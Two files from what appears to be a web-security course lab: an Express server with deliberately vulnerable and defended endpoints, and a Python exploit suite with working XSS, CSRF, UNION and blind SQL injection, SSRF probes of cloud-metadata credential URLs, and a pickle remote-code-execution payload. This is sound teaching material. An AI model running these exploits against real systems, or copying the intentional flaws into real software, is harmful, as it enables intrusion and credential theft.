File: phases/12-cryptography-and-security/21-web-security-xss-csrf-sqli-ssrf-deserialization/code/main.ts
import express, { Request, Response } from "express";
import Database from "better-sqlite3";
import crypto from "node:crypto";

const app = express();
const PORT = 4001;

app.use(express.urlencoded({ extended: true }));
app.use(express.json());

const db = new Database(":memory:");
db.exec(`
  CREATE TABLE users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    username TEXT UNIQUE NOT NULL,
    password TEXT NOT NULL
  );
  INSERT INTO users (username, password) VALUES ('admin', 'supersecret');
  INSERT INTO users (username, password) VALUES ('alice', 'password123');
`);
const getStmt = db.prepare("SELECT * FROM users WHERE username = ? AND password = ?");

const comments: string[] = [
  "First post!",
  "Great lesson on web security.",
];

const sessions = new Map<string, { username: string; csrfToken: string }>();

function randomToken(): string {
  return crypto.randomBytes(32).toString("hex");
}

function getSession(req: Request): { username: string; csrfToken: string } | null {
  const sid = req.headers.cookie?.match(/session=([^;]+)/)?.[1];
  if (!sid) return null;
  return sessions.get(sid) ?? null;
}

function withSession(req: Request, res: Response): { username: string; csrfToken: string } | null {
  const session = getSession(req);
  if (!session) {
    res.status(401).send("Unauthorized");
    return null;
  }
  return session;
}

// ── VULNERABLE ENDPOINTS ──────────────────────────────────────────

app.get("/search-vuln", (req: Request, res: Response) => {
  const q = (req.query.q as string) ?? "";
  res.send(`<!DOCTYPE html><html><body><h1>Results for ${q}</h1></body></html>`);
});

app.post("/login-vuln", (req: Request, res: Response) => {
  const { username, password } = req.body;
  const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;
  const row = db.prepare(sql).get() as Record<string, unknown> | undefined;
  if (row) {
    const sid = randomToken();
    sessions.set(sid, { username: row.username as string, csrfToken: randomToken() });
    res.setHeader("Set-Cookie", `session=${sid}; Path=/; HttpOnly`);
    res.send(`Welcome, ${row.username as string}`);
  } else {
    res.status(401).send("Invalid credentials");
  }
});

app.get("/comments-vuln", (_req: Request, res: Response) => {
  const items = comments.map((c, i) => `<li>${c}</li>`).join("\n");
  res.send(`<!DOCTYPE html><html><body><ul>${items}</ul></body></html>`);
});

app.post("/comment-vuln", (req: Request, res: Response) => {
  const text = req.body.text ?? "";
  comments.push(text);
  res.redirect("/comments-vuln");
});

app.post("/change-password-vuln", (req: Request, res: Response) => {
  const session = withSession(req, res);
  if (!session) return;
  const { newPassword } = req.body;
  db.prepare("UPDATE users SET password = ? WHERE username = ?").run(newPassword, session.username);
  res.send("Password changed");
});

app.post("/fetch-url-vuln", async (req: Request, res: Response) => {
  const url = req.body.url as string;
  try {
    const resp = await fetch(url);
    const text = await resp.text();
    res.send(text);
  } catch {
    res.status(500).send("Fetch failed");
  }
});

app.post("/deserialize-vuln", (req: Request, res: Response) => {
  const data = req.body.data as string;
  try {
    const obj = JSON.parse(data);
    res.json({ deserialized: obj });
  } catch {
    res.status(400).send("Invalid JSON");
  }
});

// ── DEFENDED ENDPOINTS ────────────────────────────────────────────

function escapeHtml(s: string): string {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

app.get("/search", (req: Request, res: Response) => {
  const q = escapeHtml((req.query.q as string) ?? "");
  res.setHeader("Content-Security-Policy", "default-src 'self'; script-src 'self'");
  res.send(`<!DOCTYPE html><html><body><h1>Results for ${q}</h1></body></html>`);
});

app.post("/login", (req: Request, res: Response) => {
  const { username, password } = req.body;
  const row = getStmt.get(username, password) as Record<string, unknown> | undefined;
  if (row) {
    const sid = randomToken();
    sessions.set(sid, { username: row.username as string, csrfToken: randomToken() });
    res.setHeader("Set-Cookie", `session=${sid}; Path=/; HttpOnly; SameSite=Strict`);
    res.send(`Welcome, ${escapeHtml(row.username as string)}`);
  } else {
    res.status(401).send("Invalid credentials");
  }
});

app.get("/comments", (_req: Request, res: Response) => {
  const items = comments.map((c, i) => `<li>${escapeHtml(c)}</li>`).join("\n");
  res.setHeader("Content-Security-Policy", "default-src 'self'; script-src 'self'");
  res.send(`<!DOCTYPE html><html><body><ul>${items}</ul></body></html>`);
});

app.post("/comment", (req: Request, res: Response) => {
  const text = req.body.text ?? "";
  comments.push(text);
  res.redirect("/comments");
});

app.post("/change-password", (req: Request, res: Response) => {
  const session = withSession(req, res);
  if (!session) return;
  const csrfHeader = req.headers["x-csrf-token"] as string;
  if (!csrfHeader || csrfHeader !== session.csrfToken) {
    res.status(403).send("CSRF token mismatch");
    return;
  }
  const { newPassword } = req.body;
  db.prepare("UPDATE users SET password = ? WHERE username = ?").run(newPassword, session.username);
  res.send("Password changed");
});

app.get("/csrf-token", (req: Request, res: Response) => {
  const session = withSession(req, res);
  if (!session) return;
  res.json({ token: session.csrfToken });
});

const ALLOWED_HOSTS = new Set(["api.example.com", "safe.internal"]);
function isAllowedUrl(url: string): boolean {
  try {
    const parsed = new URL(url);
    if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return false;
    if (!ALLOWED_HOSTS.has(parsed.hostname)) return false;
    if (parsed.hostname === "169.254.169.254") return false;
    const ipPattern = /^(10\.|172\.(1[6-9]|2\d|3[01])\.|192\.168\.|127\.)/;
    if (ipPattern.test(parsed.hostname)) return false;
    return true;
  } catch {
    return false;
  }
}

app.post("/fetch-url", async (req: Request, res: Response) => {
  const url = req.body.url as string;
  if (!isAllowedUrl(url)) {
    res.status(403).send("URL not allowed");
    return;
  }
  try {
    const resp = await fetch(url);
    const text = await resp.text();
    res.send(text);
  } catch {
    res.status(500).send("Fetch failed");
  }
});

app.post("/deserialize", (req: Request, res: Response) => {
  const data = req.body.data as string;
  const signature = req.headers["x-signature"] as string;
  if (!signature || signature !== "valid-signature-for-trusted-data") {
    res.status(403).send("Untrusted data rejected");
    return;
  }
  try {
    const obj = JSON.parse(data);
    res.json({ deserialized: obj });
  } catch {
    res.status(400).send("Invalid JSON");
  }
});

app.listen(PORT, () => {
  console.log(`Web Security Lab running on http://localhost:${PORT}`);
  console.log(`  XSS vuln:    /search-vuln?q=<script>alert(1)</script>`);
  console.log(`  SQLi vuln:   POST /login-vuln  username=admin' OR '1'='1`);
  console.log(`  CSRF vuln:   POST /change-password-vuln`);
  console.log(`  SSRF vuln:   POST /fetch-url-vuln  url=http://169.254.169.254/`);
  console.log(`  Defended:    /search, /login, /change-password, /fetch-url, /deserialize`);
});

File: phases/12-cryptography-and-security/21-web-security-xss-csrf-sqli-ssrf-deserialization/code/main.py
"""
Web Security — XSS, CSRF, SQLi, SSRF, Deserialization Exploit Scripts

Phase 12 — Cryptography & Security, Lesson 21

Usage:
    python3 main.py xss      # XSS exploit demo
    python3 main.py csrf     # CSRF exploit demo
    python3 main.py sqli     # SQL injection exploit demo
    python3 main.py ssrf     # SSRF exploit demo
    python3 main.py pickle   # Pickle deserialization RCE demo
    python3 main.py all      # Run all exploit demos
    python3 main.py defend   # Run all defended versions (should fail)
"""

import argparse
import http.server
import io
import json
import os
import pickle
import socket
import subprocess
import sys
import threading
import time
import urllib.parse

import requests


# ---------------------------------------------------------------------------
# XSS — Cross-Site Scripting
# ---------------------------------------------------------------------------

def xss_steal_cookie(target_url: str, payload: str) -> str:
    """
    Sends a reflected XSS payload to a vulnerable endpoint.
    Returns the raw HTML response containing the unescaped payload.
    """
    resp = requests.get(target_url, params={"q": payload}, timeout=5)
    return resp.text


def xss_stored_comment(target_url: str, payload: str) -> str:
    """
    Stores an XSS payload via the comment endpoint, then retrieves it.
    """
    requests.post(f"{target_url}/comment-vuln", data={"text": payload}, timeout=5)
    resp = requests.get(f"{target_url}/comments-vuln", timeout=5)
    return resp.text


# ---------------------------------------------------------------------------
# CSRF — Cross-Site Request Forgery
# ---------------------------------------------------------------------------

CSRF_HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<body>
<h1>You won a prize! Click to claim...</h1>
<form id="f" action="{action}" method="POST">
  <input type="hidden" name="newPassword" value="hacked">
</form>
<script>document.getElementById('f').submit();</script>
</body>
</html>"""


def csrf_attack(target_url: str, victim_action: str) -> str:
    """
    Generates an auto-submitting HTML form for CSRF.
    Returns the HTML content for use in an iframe or served to the victim.
    """
    return CSRF_HTML_TEMPLATE.format(action=victim_action)


def csrf_serve_and_exploit(server_url: str, action_endpoint: str) -> None:
    """
    Starts a local HTTP server serving a CSRF page,
    then opens it in a browser (or prints the URL for manual use).
    """
    html = csrf_attack(server_url, action_endpoint)
    port = 8888

    class Handler(http.server.BaseHTTPRequestHandler):
        def do_GET(self) -> None:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(html.encode())

        def log_message(self, format: str, *args: object) -> None:
            pass

    server = http.server.HTTPServer(("0.0.0.0", port), Handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    print(f"[CSRF] Serving CSRF page at http://localhost:{port}/")
    print(f"[CSRF] Victim must be logged into {server_url}")
    print(f"[CSRF] When visited, it will POST to {action_endpoint}")
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        server.shutdown()


# ---------------------------------------------------------------------------
# SQLi — SQL Injection
# ---------------------------------------------------------------------------

def sqli_extract_table(target_url: str, table_name: str) -> list[dict[str, str]]:
    """
    Uses UNION-based SQL injection to extract data from a named table.
    Assumes the vulnerable login endpoint returns all matching rows.
    Injects: ' UNION SELECT id, username, password FROM <table> --
    """
    payload = f"' UNION SELECT id, username, password FROM {table_name} --"
    resp = requests.post(
        f"{target_url}/login-vuln",
        data={"username": payload, "password": ""},
        timeout=5,
    )
    lines = resp.text.strip().split("\n")
    results = []
    for line in lines:
        if "Welcome," in line:
            results.append({"username": line.replace("Welcome, ", ""), "extracted": True})
    return results


def sqli_blind_extract(target_url: str) -> str:
    """
    Boolean-based blind SQLi extraction of the admin password.
    Uses SUBSTR and binary search per character.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    extracted = ""
    url = f"{target_url}/login-vuln"
    for pos in range(1, 33):
        found = False
        for ch in charset:
            payload = f"admin' AND SUBSTR((SELECT password FROM users WHERE username='admin'),{pos},1)='{ch}' --"
            resp = requests.post(url, data={"username": payload, "password": ""}, timeout=5)
            if "Welcome" in resp.text:
                extracted += ch
                found = True
                break
        if not found:
            break
    return extracted


# ---------------------------------------------------------------------------
# SSRF — Server-Side Request Forgery
# ---------------------------------------------------------------------------

def ssrf_probe(target_url: str, internal_endpoint: str) -> str:
    """
    Probes an internal endpoint through the vulnerable fetch-url endpoint.
    Returns the response text from the internal service.
    """
    resp = requests.post(
        f"{target_url}/fetch-url-vuln",
        json={"url": internal_endpoint},
        timeout=10,
    )
    return resp.text


def ssrf_metadata(target_url: str) -> dict[str, str]:
    """
    Attempts to reach cloud metadata services through SSRF.
    """
    endpoints = [
        "http://169.254.169.254/latest/meta-data/",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://metadata.google.internal/computeMetadata/v1/",
    ]
    results: dict[str, str] = {}
    for ep in endpoints:
        try:
            text = ssrf_probe(target_url, ep)
            results[ep] = text[:500] if text else "(empty)"
        except Exception as exc:
            results[ep] = f"(error: {exc})"
    return results


# ---------------------------------------------------------------------------
# Insecure Deserialization — Pickle RCE
# ---------------------------------------------------------------------------

class PickleExploit:
    """
    A malicious pickle payload that executes a command during deserialization.
    Uses __reduce__ to return (os.system, (command,)).
    """

    def __reduce__(self):
        cmd = "echo 'PICKLE_RCE: $(whoami) on $(hostname)'"
        return (os.system, (cmd,))


def unsafe_deserialize(pickle_data: bytes) -> object:
    """
    Deserializes untrusted pickle data.
    WARNING: This will execute arbitrary code embedded in the pickle.
    """
    return pickle.loads(pickle_data)


def pickle_rce_demo() -> None:
    """
    Demonstrates Python pickle RCE by crafting and deserializing
    a malicious payload.
    """
    payload = pickle.dumps(PickleExploit())
    print(f"[Pickle] Crafted payload ({len(payload)} bytes)")
    print(f"[Pickle] Raw bytes (first 80): {payload[:80]}")
    print("[Pickle] Deserializing now — this will execute os.system()...")
    result = unsafe_deserialize(payload)
    print(f"[Pickle] Deserialized result: {result}")


# ---------------------------------------------------------------------------
# Defended version tests (these should FAIL against the /search, /login, etc.)
# ---------------------------------------------------------------------------

def defend_xss(target_url: str) -> bool:
    """
    Tests the defended /search endpoint — XSS payload should be escaped.
    Returns True if the response is safe (payload escaped).
    """
    payload = '<script>alert(1)</script>'
    resp = requests.get(f"{target_url}/search", params={"q": payload}, timeout=5)
    return payload not in resp.text


def defend_sqli(target_url: str) -> bool:
    """
    Tests the defended /login endpoint — SQLi should fail.
    Returns True if login was rejected.
    """
    resp = requests.post(
        f"{target_url}/login",
        data={"username": "admin' OR '1'='1", "password": ""},
        timeout=5,
    )
    return resp.status_code == 401


def defend_csrf(target_url: str) -> bool:
    """
    Tests the defended /change-password endpoint — request without
    CSRF token should be rejected.
    """
    resp = requests.post(
        f"{target_url}/change-password",
        data={"newPassword": "hacked"},
        timeout=5,
    )
    return resp.status_code == 403


def defend_ssrf(target_url: str) -> bool:
    """
    Tests the defended /fetch-url endpoint — internal IPs should be rejected.
    """
    resp = requests.post(
        f"{target_url}/fetch-url",
        json={"url": "http://169.254.169.254/latest/meta-data/"},
        timeout=5,
    )
    return resp.status_code == 403


def defend_deserialize(target_url: str) -> bool:
    """
    Tests the defended /deserialize endpoint — unsigned data should be rejected.
    """
    resp = requests.post(
        f"{target_url}/deserialize",
        json={"data": '{"malicious": true}'},
        headers={"x-signature": ""},
        timeout=5,
    )
    return resp.status_code == 403


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------

def run_all(target_url: str) -> None:
    print("=" * 60)
    print("WEB SECURITY LAB — Exploit Suite")
    print("=" * 60)

    print("\n── XSS Reflected ──")
    text = xss_steal_cookie(target_url, '<script>alert(1)</script>')
    print(f"  Payload present in response: {'<script>' in text}")

    print("\n── CSRF Page ──")
    html = csrf_attack(target_url, f"{target_url}/change-password-vuln")
    print(f"  Generated {len(html)} byte HTML page")

    print("\n── SQLi UNION Extract ──")
    rows = sqli_extract_table(target_url, "users")
    print(f"  Extracted {len(rows)} rows")

    print("\n── SSRF Probe ──")
    results = ssrf_metadata(target_url)
    for ep, text in results.items():
        print(f"  {ep}: {text[:80]}")

    print("\n── Pickle RCE ──")
    pickle_rce_demo()

    print("\n── Defenses (should all be True) ──")
    print(f"  XSS escaped:    {defend_xss(target_url)}")
    print(f"  SQLi blocked:   {defend_sqli(target_url)}")
    print(f"  CSRF blocked:   {defend_csrf(target_url)}")
    print(f"  SSRF blocked:   {defend_ssrf(target_url)}")
    print(f"  Deser blocked:  {defend_deserialize(target_url)}")


def run_defend(target_url: str) -> None:
    results = {
        "xss": defend_xss(target_url),
        "sqli": defend_sqli(target_url),
        "csrf": defend_csrf(target_url),
        "ssrf": defend_ssrf(target_url),
        "deserialize": defend_deserialize(target_url),
    }
    for name, ok in results.items():
        status = "PASS" if ok else "FAIL"
        print(f"[{status}] {name}")
    if all(results.values()):
        print("\nAll defenses active!")
    else:
        print("\nSome defenses are missing!")


def main() -> None:
    parser = argparse.ArgumentParser(description="Web Security Exploit Suite")
    parser.add_argument(
        "action",
        nargs="?",
        default="all",
        choices=["xss", "csrf", "sqli", "ssrf", "pickle", "all", "defend"],
    )
    parser.add_argument("--target", default="http://localhost:4001", help="Target URL")
    args = parser.parse_args()

    actions = {
        "xss": lambda: print(xss_steal_cookie(args.target, '<script>alert(1)</script>')),
        "csrf": lambda: csrf_serve_and_exploit(args.target, f"{args.target}/change-password-vuln"),
        "sqli": lambda: print(sqli_extract_table(args.target, "users")),
        "ssrf": lambda: print(ssrf_metadata(args.target)),
        "pickle": pickle_rce_demo,
        "all": lambda: run_all(args.target),
        "defend": lambda: run_defend(args.target),
    }

    actions[args.action]()


if __name__ == "__main__":
    main()
